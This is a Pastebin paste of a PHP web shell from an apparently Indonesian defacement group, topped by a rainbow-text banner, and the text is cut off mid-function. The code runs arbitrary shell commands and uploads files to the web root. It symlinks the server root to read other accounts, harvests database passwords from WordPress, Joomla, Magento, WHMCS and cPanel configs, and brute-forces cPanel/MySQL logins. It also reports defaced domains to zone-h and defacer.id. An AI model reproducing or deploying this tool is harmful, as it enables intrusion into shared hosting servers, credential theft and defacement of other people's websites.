Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <script language="JavaScript1.2">
- function ClearError() {return true;}
- window.onerror = ClearError;
- </script>
- <br>
- <br>
- <div align="center"><table border="0" width="70%"><tr><td>
- <h1><font face="Bradley Hand ITC"><center><SCRIPT>
- farbbibliothek = new Array();
- farbbibliothek[0] = new Array("#FF0000","#FF1100","#FF2200","#FF3300","#FF4400","#FF5500","#FF6600","#FF7700","#FF8800","#FF9900","#FFaa00","#FFbb00","#FFcc00","#FFdd00","#FFee00","#FFff00","#FFee00","#FFdd00","#FFcc00","#FFbb00","#FFaa00","#FF9900","#FF8800","#FF7700","#FF6600","#FF5500","#FF4400","#FF3300","#FF2200","#FF1100");
- farbbibliothek[1] = new Array("#FF0000","#FFFFFF","#FFFFFF","#FF0000");
- farbbibliothek[2] = new Array("#FFFFFF","#FF0000","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF");
- farbbibliothek[3] = new Array("#FF0000","#FF4000","#FF8000","#FFC000","#FFFF00","#C0FF00","#80FF00","#40FF00","#00FF00","#00FF40","#00FF80","#00FFC0","#00FFFF","#00C0FF","#0080FF","#0040FF","#0000FF","#4000FF","#8000FF","#C000FF","#FF00FF","#FF00C0","#FF0080","#FF0040");
- farbbibliothek[4] = new Array("#FF0000","#EE0000","#DD0000","#CC0000","#BB0000","#AA0000","#990000","#880000","#770000","#660000","#550000","#440000","#330000","#220000","#110000","#000000","#110000","#220000","#330000","#440000","#550000","#660000","#770000","#880000","#990000","#AA0000","#BB0000","#CC0000","#DD0000","#EE0000");
- farbbibliothek[5] = new Array("#FF0000","#FF0000","#FF0000","#FFFFFF","#FFFFFF","#FFFFFF");
- farbbibliothek[6] = new Array("#FF0000","#FDF5E6");
- farben = farbbibliothek[4];
- function farbschrift()
- {
- for(var i=0 ; i<Buchstabe.length; i++)
- {
- document.all["a"+i].style.color=farben[i];
- }
- farbverlauf();
- }
- function string2array(text)
- {
- Buchstabe = new Array();
- while(farben.length<text.length)
- {
- farben = farben.concat(farben);
- }
- k=0;
- while(k<=text.length)
- {
- Buchstabe[k] = text.charAt(k);
- k++;
- }
- }
- function divserzeugen()
- {
- for(var i=0 ; i<Buchstabe.length; i++)
- {
- document.write("<span id='a"+i+"' class='a"+i+"'>"+Buchstabe[i] + "</span>");
- }
- farbschrift();
- }
- var a=1;
- function farbverlauf()
- {
- for(var i=0 ; i<farben.length; i++)
- {
- farben[i-1]=farben[i];
- }
- farben[farben.length-1]=farben[-1];
- setTimeout("farbschrift()",30);
- }
- //
- var farbsatz=1;
- function farbtauscher()
- {
- farben = farbbibliothek[farbsatz];
- while(farben.length<text.length)
- {
- farben = farben.concat(farben);
- }
- farbsatz=Math.floor(Math.random()*(farbbibliothek.length-0.0001));
- }
- setInterval("farbtauscher()",9000);
- text ="INDONESIA DEFACER TERSAKITI";//h
- string2array(text);
- divserzeugen();
- //document.write(text);
- </SCRIPT></center></h1></font>
- <!Jembud>
- <html>
- <embed src="https://www.youtube.com/v/gZ1HidB0cNo&autoplay=1" type="application/x-shockwave-flash" flashvars="id=8ieil01vld0&loop=1&autoplay=1&title=Tell me what you want :(" width="0" height="0" allowfullscreen="true" allowscriptaccess="always"></embed>
- <head>
- <link href="" rel="stylesheet" type="text/css">
- <title>KONtl</title>
- <style>
- body{
- font-family: "Racing Sans One", cursive;
- background: #00ff00 url("https://scontent-sit4-1.xx.fbcdn.net/v/t1.0-9/10429405_420371394788008_5220391784433287430_n.jpg?oh=19dc2ae615306e6819ba49204bb84621&oe=59198457") center;
- color:#A901DB;
- }
- #content tr:hover{
- background-color: lime;
- text-shadow:0px 0px 10px #01DF01;
- }
- #content .first{
- background-color: lime;
- }
- table{
- border: 1px #01DF01 dotted;
- }
- a{
- color:#01DF01;
- text-decoration: none;
- }
- a:hover{
- color:blue;
- text-shadow:0px 0px 10px #01DF01;
- }
- input,select,textarea{
- border: 1px #A901DB solid;
- -moz-border-radius: 5px;
- -webkit-border-radius:5px;
- border-radius:5px;
- }
- </style>
- </head>
- <?php
- function w($dir,$perm) {
- if(!is_writable($dir)) {
- return "<font color=lime>".$perm."</font>";
- } else {
- return "<font color=green>".$perm."</font>";
- }
- }
- function exe($cmd) {
- if(function_exists('system')) {
- @ob_start();
- @system($cmd);
- $buff = @ob_get_contents();
- @ob_end_clean();
- return $buff;
- } elseif(function_exists('exec')) {
- @exec($cmd,$results);
- $buff = "";
- foreach($results as $result) {
- $buff .= $result;
- } return $buff;
- } elseif(function_exists('passthru')) {
- @ob_start();
- @passthru($cmd);
- $buff = @ob_get_contents();
- @ob_end_clean();
- return $buff;
- } elseif(function_exists('shell_exec')) {
- $buff = @shell_exec($cmd);
- return $buff;
- }
- }
- function sulap($text) {
- if(!get_magic_quotes_gpc()) {
- return $text;
- }
- return stripslashes($text);
- }
- function ambilKata($param, $kata1, $kata2){
- if(strpos($param, $kata1) === FALSE) return FALSE;
- if(strpos($param, $kata2) === FALSE) return FALSE;
- $start = strpos($param, $kata1) + strlen($kata1);
- $end = strpos($param, $kata2, $start);
- $return = substr($param, $start, $end - $start);
- return $return;
- }
- function perms($file){
- $perms = fileperms($file);
- if (($perms & 0xC000) == 0xC000) {
- // Socket
- $info = 's';
- } elseif (($perms & 0xA000) == 0xA000) {
- // Symbolic Link
- $info = 'l';
- } elseif (($perms & 0x8000) == 0x8000) {
- // Regular
- $info = '-';
- } elseif (($perms & 0x6000) == 0x6000) {
- // Block special
- $info = 'b';
- } elseif (($perms & 0x4000) == 0x4000) {
- // Directory
- $info = 'd';
- } elseif (($perms & 0x2000) == 0x2000) {
- // Character special
- $info = 'c';
- } elseif (($perms & 0x1000) == 0x1000) {
- // FIFO pipe
- $info = 'p';
- } else {
- // Unknown
- $info = 'u';
- }
- // Owner
- $info .= (($perms & 0x0100) ? 'r' : '-');
- $info .= (($perms & 0x0080) ? 'w' : '-');
- $info .= (($perms & 0x0040) ?
- (($perms & 0x0800) ? 's' : 'x' ) :
- (($perms & 0x0800) ? 'S' : '-'));
- // Group
- $info .= (($perms & 0x0020) ? 'r' : '-');
- $info .= (($perms & 0x0010) ? 'w' : '-');
- $info .= (($perms & 0x0008) ?
- (($perms & 0x0400) ? 's' : 'x' ) :
- (($perms & 0x0400) ? 'S' : '-'));
- // World
- $info .= (($perms & 0x0004) ? 'r' : '-');
- $info .= (($perms & 0x0002) ? 'w' : '-');
- $info .= (($perms & 0x0001) ?
- (($perms & 0x0200) ? 't' : 'x' ) :
- (($perms & 0x0200) ? 'T' : '-'));
- return $info;
- }
- $sys = php_uname();
- $ip = gethostbyname($_SERVER['HTTP_HOST']);
- $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? '<font>ON</font>' : '<font>OFF</font>';
- $getds = @ini_get("disable_functions");
- $ds = (!empty($getds)) ? "<font>$ds</font>" : "<font>NONE</font>";
- if(isset($_GET['path'])){
- $path = $_GET['path'];
- }else{
- $path = getcwd();
- }
- $path = str_replace('\\','/',$path);
- $paths = explode('/',$path);
- $home_r = $_SERVER['DOCUMENT_ROOT'];
- if(get_magic_quotes_gpc()){
- foreach($_POST as $key=>$value){
- $_POST[$key] = stripslashes($value);
- }
- }
- if($_POST['upload']) {
- if($_POST['tipe_upload'] == 'biasa') {
- if(@copy($_FILES['ix_file']['tmp_name'], "$path/".$_FILES['ix_file']['name']."")) {
- $act = "<font color=green>Uploaded!</font> at <i><b>$path/".$_FILES['ix_file']['name']."</b></i>";
- } else {
- $act = "<font color=lime>Failed to upload file</font>";
- }
- } else {
- $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
- $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
- if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
- if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
- $act = "<font color=green>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
- } else {
- $act = "<font color=lime>Failed to upload file</font>";
- }
- } else {
- $act = "<font color=lime>Failed to upload file</font>";
- }
- }
- }
- echo "<center>Uploader :
- <form method='post' enctype='multipart/form-data'>
- <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($path,"Writeable")." ]
- <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
- <input type='file' name='ix_file'>
- <input type='submit' value='upload' name='upload'>
- </form>";
- echo $act;
- echo '
- <tr><td>
- <center>
- <input type="submit" value="Home" onclick="window.location=\'?\'"><input type="submit" value="Back" onclick="history.back(-1)"><input type="submit" value="Symlink" onclick="window.location=\'?path='.$path.'&kntd=symlink\'"><input type="submit" value="Config Grabber" onclick="window.location=\'?path='.$path.'&kntd=config\'"><input type="submit" value="Cpanel Cracker" onclick="window.location=\'?path='.$path.'&kntd=cpanelnih\'"><input type="submit" value="Adminer" onclick="window.location=\'?path='.$path.'&kntd=adminer\'"><input type="submit" value="Jumping" onclick="window.location=\'?path='.$path.'&kntd=jumping\'"><input type="submit" value="Zone-h" onclick="window.location=\'?path='.$path.'&kntd=zoneh\'"><input type="submit" value="Defacerid" onclick="window.location=\'?path='.$path.'&kntd=defid\'"><input type="submit" value="Back Connect" onclick="window.location=\'?path='.$path.'&kntd=network\'"><br><input type="submit" value="Mailer" onclick="window.location=\'?path='.$path.'&kntd=mail\'"><input type="submit" value="System Info" onclick="window.location=\'?path='.$path.'&kntd=info\'"><input type="submit" value="Bypass Vhost" onclick="window.location=\'?path='.$path.'&kntd=vhost\'"><input type="submit" value="Vhost Config Grabber" onclick="window.location=\'?path='.$path.'&kntd=vhostgrab\'"><input type="submit" value="Kill Self" onclick="window.location=\'?kntd=kill\'">
- </left>
- </td></tr></table><br>
- <table width="700" align="center">
- <tr><td><font color="white">Current Path :</font>';
- foreach($paths as $id=>$pat){
- if($pat == '' && $id == 0){
- $a = true;
- echo '<a href="?path=/">/</a>';
- continue;
- }
- if($pat == '') continue;
- echo '<a href="?path=';
- for($i=0;$i<=$id;$i++){
- echo "$paths[$i]";
- if($i != $id) echo "/";
- }
- echo '">'.$pat.'</a>/';
- }
- echo '</td></tr>';
- echo '</table>';
- if($_GET['unset'] == 'key') {
- unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
- echo "<script>window.location='?';</script>";
- }elseif($_GET['kntd'] == 'info') {
- echo '<br><table width="700" align="center">
- <tr><td>
- <center>
- System : '.$sys.'<br>
- IP : '.$ip.'<br>
- Safe Mode : '.$sm.'<br>
- Disabled Functions : '.$ds.'<br>
- Home_root : '.$home_r.'
- </center>
- </td></tr>
- </table>';
- }elseif($_GET['kntd'] == 'kill') {
- $fileini = $_SERVER['SCRIPT_FILENAME'];
- rmdir('kntd_sym');rmdir('kontol_conf');unlink($fileini);
- echo '<script>window.location="https://www.facebook.com/defacertersakititeam";</script>';
- }
- elseif($_GET['kntd'] == 'symlink') {
- $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
- $d0mains = @file("/etc/named.conf");
- ##httaces
- if($d0mains){
- @mkdir("kontol_sym",0777);
- @chdir("kontol_sym");
- @exe("ln -s / root");
- $file3 = 'Options Indexes FollowSymLinks
- DirectoryIndex noname.htm
- AddType text/plain .php
- AddHandler text/plain .php
- Satisfy Any';
- $fp3 = fopen('.htaccess','w');
- $fw3 = fwrite($fp3,$file3);@fclose($fp3);
- echo "
- <table align=center border=1 style='width:60%;border-color:#333333;'>
- <tr>
- <td align=center><font size=2>S. No.</font></td>
- <td align=center><font size=2>Domains</font></td>
- <td align=center><font size=2>Users</font></td>
- <td align=center><font size=2>Symlink</font></td>
- </tr>";
- $dcount = 1;
- foreach($d0mains as $d0main){
- if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
- flush();
- if(strlen(trim($domains[1][0])) > 2){
- $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
- echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
- <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
- <td>".$user['name']."</td>
- <td><a href='$full/kontol_sym/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
- flush();
- $dcount++;}}}
- echo "</table>";
- }else{
- $TEST=@file('/etc/passwd');
- if ($TEST){
- @mkdir("kontol_sym",0777);
- @chdir("kontol_sym");
- exe("ln -s / root");
- $file3 = 'Options Indexes FollowSymLinks
- DirectoryIndex noname.htm
- AddType text/plain .php
- AddHandler text/plain .php
- Satisfy Any';
- $fp3 = fopen('.htaccess','w');
- $fw3 = fwrite($fp3,$file3);
- @fclose($fp3);
- echo "
- <table align=center border=1><tr>
- <td align=center><font size=3>S. No.</font></td>
- <td align=center><font size=3>Users</font></td>
- <td align=center><font size=3>Symlink</font></td></tr>";
- $dcount = 1;
- $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
- while(!feof($file)){
- $s = fgets($file);
- $matches = array();
- $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
- $matches = str_replace("home/","",$matches[1]);
- if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
- continue;
- echo "<tr><td align=center><font size=2>" . $dcount . "</td>
- <td align=center><font class=txt>" . $matches . "</td>";
- echo "<td align=center><font class=txt><a href=$full/kontol_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
- $dcount++;}fclose($file);
- echo "</table>";}else{if($os != "Windows"){@mkdir("kontol_sym",0777);@chdir("kontol_sym");@exe("ln -s / root");$file3 = '
- Options Indexes FollowSymLinks
- DirectoryIndex noname.htm
- AddType text/plain .php
- AddHandler text/plain .php
- Satisfy Any
- ';
- $fp3 = fopen('.htaccess','w');
- $fw3 = fwrite($fp3,$file3);@fclose($fp3);
- echo "
- <div class='mybox'><h2 class='k2ll33d2'>server symlinker</h2>
- <table align=center border=1><tr>
- <td align=center><font size=3>ID</font></td>
- <td align=center><font size=3>Users</font></td>
- <td align=center><font size=3>Symlink</font></td></tr>";
- $temp = "";$val1 = 0;$val2 = 1000;
- for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
- if ($uid)$temp .= join(':',$uid)."\n";}
- echo '<br/>';$temp = trim($temp);$file5 =
- fopen("test.txt","w");
- fputs($file5,$temp);
- fclose($file5);$dcount = 1;$file =
- fopen("test.txt", "r") or exit("Unable to open file!");
- while(!feof($file)){$s = fgets($file);$matches = array();
- $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
- if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
- continue;
- echo "<tr><td align=center><font size=2>" . $dcount . "</td>
- <td align=center><font class=txt>" . $matches . "</td>";
- echo "<td align=center><font class=txt><a href=$full/kontol_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
- $dcount++;}
- fclose($file);
- echo "</table></div></center>";unlink("test.txt");
- } else
- echo "<center><font size=3>Cannot create Symlink</font></center>";
- }
- }
- }
- elseif($_GET['kntd'] == 'config') {
- $etc = fopen("/etc/passwd", "r") or die("<pre><font color=lime>Can't read /etc/passwd</font></pre>");
- $idx = mkdir("kontol_conf", 0777);
- $isi_htc = "Options all\nRequire None\nSatisfy Any";
- $htc = fopen("kontol_conf/.htaccess","w");
- fwrite($htc, $isi_htc);
- while($passwd = fgets($etc)) {
- if($passwd == "" || !$etc) {
- echo "<font color=lime>Can't read /etc/passwd</font>";
- } else {
- preg_match_all('/(.*?):x:/', $passwd, $user_config);
- foreach($user_config[1] as $thiskntd) {
- $user_config_dir = "/home/$myuser/public_html/";
- if(is_readable($user_config_dir)) {
- $grab_config = array(
- "/home/$thiskntd/.my.cnf" => "cpanel",
- "/home/$thiskntd/.accesshash" => "WHM-accesshash",
- "/home/$thiskntd/public_html/po-content/config.php" => "Popoji",
- "/home/$thiskntd/public_html/vdo_config.php" => "Voodoo",
- "/home/$thiskntd/public_html/bw-configs/config.ini" => "BosWeb",
- "/home/$thiskntd/public_html/config/koneksi.php" => "Lokomedia",
- "/home/$thiskntd/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
- "/home/$thiskntd/public_html/clientarea/configuration.php" => "WHMCS",
- "/home/$thiskntd/public_html/whm/configuration.php" => "WHMCS",
- "/home/$thiskntd/public_html/whmcs/configuration.php" => "WHMCS",
- "/home/$thiskntd/public_html/forum/config.php" => "phpBB",
- "/home/$thiskntd/public_html/sites/default/settings.php" => "Drupal",
- "/home/$thiskntd/public_html/config/settings.inc.php" => "PrestaShop",
- "/home/$thiskntd/public_html/app/etc/local.xml" => "Magento",
- "/home/$thiskntd/public_html/joomla/configuration.php" => "Joomla",
- "/home/$thiskntd/public_html/configuration.php" => "Joomla",
- "/home/$thiskntd/public_html/wp/wp-config.php" => "WordPress",
- "/home/$thiskntd/public_html/wordpress/wp-config.php" => "WordPress",
- "/home/$thiskntd/public_html/wp-config.php" => "WordPress",
- "/home/$thiskntd/public_html/admin/config.php" => "OpenCart",
- "/home/$thiskntd/public_html/slconfig.php" => "Sitelok",
- "/home/$thiskntd/public_html/application/config/database.php" => "Ellislab");
- foreach($grab_config as $config => $nama_config) {
- $ambil_config = file_get_contents($config);
- if($ambil_config == '') {
- } else {
- $file_config = fopen("kontol_conf/$thiskntd-$nama_config.txt","w");
- fputs($file_config,$ambil_config);
- }
- }
- }
- }
- }
- }
- echo "<br><center><a href='?path=$path/kontol_conf'><font>Done</font></a></center>";
- }elseif($_GET['kntd'] == 'adminer') {
- $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
- function adminer($url, $isi) {
- $fp = fopen($isi, "w");
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $url);
- curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
- curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
- curl_setopt($ch, CURLOPT_FILE, $fp);
- return curl_exec($ch);
- curl_close($ch);
- fclose($fp);
- ob_flush();
- flush();
- }
- if(file_exists('adminer.php')) {
- echo "<center><font><a href='$full/adminer.php' target='_blank'>-> Adminer <-</a></font></center>";
- } else {
- if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
- echo "<center><font><a href='$full/adminer.php' target='_blank'>-> Adminer <-</a></font></center>";
- } else {
- echo "<center><font color=lime>gagal buat file adminer</font></center>";
- }
- }
- }elseif($_GET['kntd'] == 'cpanelnih') {
- echo '<center>';
- if($_POST['crack']) {
- $usercp = explode("\r\n", $_POST['user_cp']);
- $passcp = explode("\r\n", $_POST['pass_cp']);
- $i = 0;
- foreach($usercp as $ucp) {
- foreach($passcp as $pcp) {
- if(@mysql_connect('localhost', $ucp, $pcp)) {
- if($_SESSION[$ucp] && $_SESSION[$pcp]) {
- } else {
- $_SESSION[$ucp] = "1";
- $_SESSION[$pcp] = "1";
- if($ucp == '' || $pcp == '') {
- } else {
- $i++;
- if(function_exists('posix_getpwuid')) {
- $domain_cp = file_get_contents("/etc/named.conf");
- if($domain_cp == '') {
- $dom = "<font color=lime>gabisa ambil nama domain nya</font>";
- } else {
- preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
- foreach($domains_cp[1] as $dj) {
- $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
- $user_cp_url = $user_cp_url['name'];
- if($user_cp_url == $ucp) {
- $dom = "<a href='http://$dj/' target='_blank'><font color=green>$dj</font></a>";
- break;
- }
- }
- }
- } else {
- $dom = "<font color=lime>function is Disable by system</font>";
- }
- echo "username (<font color=green>$ucp</font>) password (<font color=green>$pcp</font>) domain ($dom)<br>";
- }
- }
- }
- }
- }
- if($i == 0) {
- } else {
- echo "<br>sukses nyolong ".$i." Cpanel by <font color=green>Jembuten.</font>";
- }
- } else {
- echo "<center>
- <form method='post'>
- USER: <br>
- <textarea style='width: 450px; height: 150px;' name='user_cp'>";
- $_usercp = fopen("/etc/passwd","r");
- while($getu = fgets($_usercp)) {
- if($getu == '' || !$_usercp) {
- echo "<font color=lime>Can't read /etc/passwd</font>";
- } else {
- preg_match_all("/(.*?):x:/", $getu, $u);
- foreach($u[1] as $user_cp) {
- if(is_dir("/home/$user_cp/public_html")) {
- echo "$user_cp\n";
- }
- }
- }
- }
- echo "</textarea><br>
- PASS: <br>
- <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
- function cp_pass($dir) {
- $pass = "";
- $dira = scandir($dir);
- foreach($dira as $dirb) {
- if(!is_file("$dir/$dirb")) continue;
- $ambil = file_get_contents("$dir/$dirb");
- if(preg_match("/WordPress/", $ambil)) {
- $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
- } elseif(preg_match("/JConfig|joomla/", $ambil)) {
- $pass .= ambilkata($ambil,"password = '","'")."\n";
- } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
- $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
- } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
- $pass .= ambilkata($ambil,'password = "','"')."\n";
- } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
- $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
- } elseif(preg_match("/^[client]$/", $ambil)) {
- preg_match("/password=(.*?)/", $ambil, $pass1);
- if(preg_match('/"/', $pass1[1])) {
- $pass1[1] = str_replace('"', "", $pass1[1]);
- $pass .= $pass1[1]."\n";
- } else {
- $pass .= $pass1[1]."\n";
- }
- } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
- $pass .= ambilkata($ambil,"db_password = '","'")."\n";
- }
- }
- echo $pass;
- }
- $cp_pass = cp_pass($dir);
- echo $cp_pass;
- echo "</textarea><br>
- <input type='submit' name='crack' style='width: 450px;' value='Crack'>
- </form>
- <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
- }
- }
- elseif($_GET['kntd'] == 'zoneh') {
- if($_POST['submit']) {
- echo '<center>';
- $domain = explode("\r\n", $_POST['url']);
- $nick = $_POST['nick'];
- echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
- echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
- function zoneh($url,$nick) {
- $ch = curl_init("http://www.zone-h.com/notify/single");
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
- curl_setopt($ch, CURLOPT_POST, true);
- curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
- return curl_exec($ch);
- curl_close($ch);
- }
- foreach($domain as $url) {
- $zoneh = zoneh($url,$nick);
- if(preg_match("/color=\"lime\">OK<\/font><\/li>/i", $zoneh)) {
- echo "$url -> <font>OK</font><br>";
- } else {
- echo "$url -> <font color=lime>ERROR</font><br>";
- }
- }
- } else {
- echo "<center><form method='post'>
- <u>Defacer</u>: <br>
- <input type='text' name='nick' size='50' value='malaikat Galau'><br>
- <u>Domains</u>: <br>
- <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
- <input type='submit' name='submit' value='Submit' style='width: 450px;'>
- </form>";
- }
- echo "</center>";
- }
- elseif($_GET['kntd'] == 'defid') {
- echo "<center><form method='post'>
- <u>Defacer</u>: <br>
- <input type='text' name='hekel' size='50' value='malaikat Galau'><br>
- <u>Team</u>: <br>
- <input type='text' name='tim' size='50' value='Malaikat Galau'><br>
- <u>Domains</u>: <br>
- <textarea style='width: 450px; height: 150px;' name='sites'></textarea><br>
- <input type='submit' name='go' value='Submit' style='width: 450px;'>
- </form>";
- $site = explode("\r\n", $_POST['sites']);
- $go = $_POST['go'];
- $hekel = $_POST['hekel'];
- $tim = $_POST['tim'];
- if($go) {
- foreach($site as $sites) {
- $zh = $sites;
- $form_url = "https://www.defacer.id/notify";
- $data_to_post = array();
- $data_to_post['attacker'] = "$hekel";
- $data_to_post['team'] = "$tim";
- $data_to_post['poc'] = 'SQL Injection';
- $data_to_post['url'] = "$zh";
- $curl = curl_init();
- curl_setopt($curl,CURLOPT_URL, $form_url);
- curl_setopt($curl,CURLOPT_POST, sizeof($data_to_post));
- curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0 (+http://search.msn.com/msnbot.htm)
- curl_setopt($curl,CURLOPT_POSTFIELDS, $data_to_post);
- curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($curl, CURLOPT_REFERER, 'https://defacer.id/notify.html');
- $result = curl_exec($curl);
- echo $result;
- curl_close($curl);
- echo "<br>";
- }
- }
- }elseif($_GET['kntd'] == 'jumping') {
- $i = 0;
- echo "<div class='margin: 5px auto;'>";
- if(preg_match("/hsphere/", $dir)) {
- $urls = explode("\r\n", $_POST['url']);
- if(isset($_POST['jump'])) {
- echo "<pre>";
- foreach($urls as $url) {
- $url = str_replace(array("http://","www."), "", strtolower($url));
- $etc = "/etc/passwd";
- $f = fopen($etc,"r");
- while($gets = fgets($f)) {
- $pecah = explode(":", $gets);
- $user = $pecah[0];
- $dir_user = "/hsphere/local/home/$user";
- if(is_dir($dir_user) === true) {
- $url_user = $dir_user."/".$url;
- if(is_readable($url_user)) {
- $i++;
- $jrw = "[<font color=green>R</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
- if(is_writable($url_user)) {
- $jrw = "[<font color=green>RW</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
- }
- echo $jrw."<br>";
- }
- }
- }
- }
- if($i == 0) {
- } else {
- echo "<br>Total ada ".$i." Kamar di ".$ip;
- }
- echo "</pre>";
- } else {
- echo '<center>
- <form method="post">
- List Domains: <br>
- <textarea name="url" style="width: 500px; height: 250px;">';
- $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
- while($getss = fgets($fp)) {
- echo $getss;
- }
- echo '</textarea><br>
- <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
- </form></center>';
- }
- } elseif(preg_match("/vhosts/", $dir)) {
- $urls = explode("\r\n", $_POST['url']);
- if(isset($_POST['jump'])) {
- echo "<pre>";
- foreach($urls as $url) {
- $web_vh = "/var/www/vhosts/$url/httpdocs";
- if(is_dir($web_vh) === true) {
- if(is_readable($web_vh)) {
- $i++;
- $jrw = "[<font color=green>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
- if(is_writable($web_vh)) {
- $jrw = "[<font color=green>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
- }
- echo $jrw."<br>";
- }
- }
- }
- if($i == 0) {
- } else {
- echo "<br>Total ada ".$i." Kamar di ".$ip;
- }
- echo "</pre>";
- } else {
- echo '<center>
- <form method="post">
- List Domains: <br>
- <textarea name="url" style="width: 500px; height: 250px;">';
- bing("ip:$ip");
- echo '</textarea><br>
- <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
- </form></center>';
- }
- } else {
- echo "<pre>";
- $etc = fopen("/etc/passwd", "r") or die("<font color=lime>Can't read /etc/passwd</font>");
- while($passwd = fgets($etc)) {
- if($passwd == '' || !$etc) {
- echo "<font color=lime>Can't read /etc/passwd</font>";
- } else {
- preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
- foreach($user_jumping[1] as $myuser_jump) {
- $user_jumping_dir = "/home/$myuser_jump/public_html";
- if(is_readable($user_jumping_dir)) {
- $i++;
- $jrw = "[<font color=green>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
- if(is_writable($user_jumping_dir)) {
- $jrw = "[<font color=green>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
- }
- echo $jrw;
- if(function_exists('posix_getpwuid')) {
- $domain_jump = file_get_contents("/etc/named.conf");
- if($domain_jump == '') {
- echo " => ( <font color=lime>gabisa ambil nama domain nya</font> )<br>";
- } else {
- preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
- foreach($domains_jump[1] as $dj) {
- $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
- $user_jumping_url = $user_jumping_url['name'];
- if($user_jumping_url == $myuser_jump) {
- echo " => ( <u>$dj</u> )<br>";
- break;
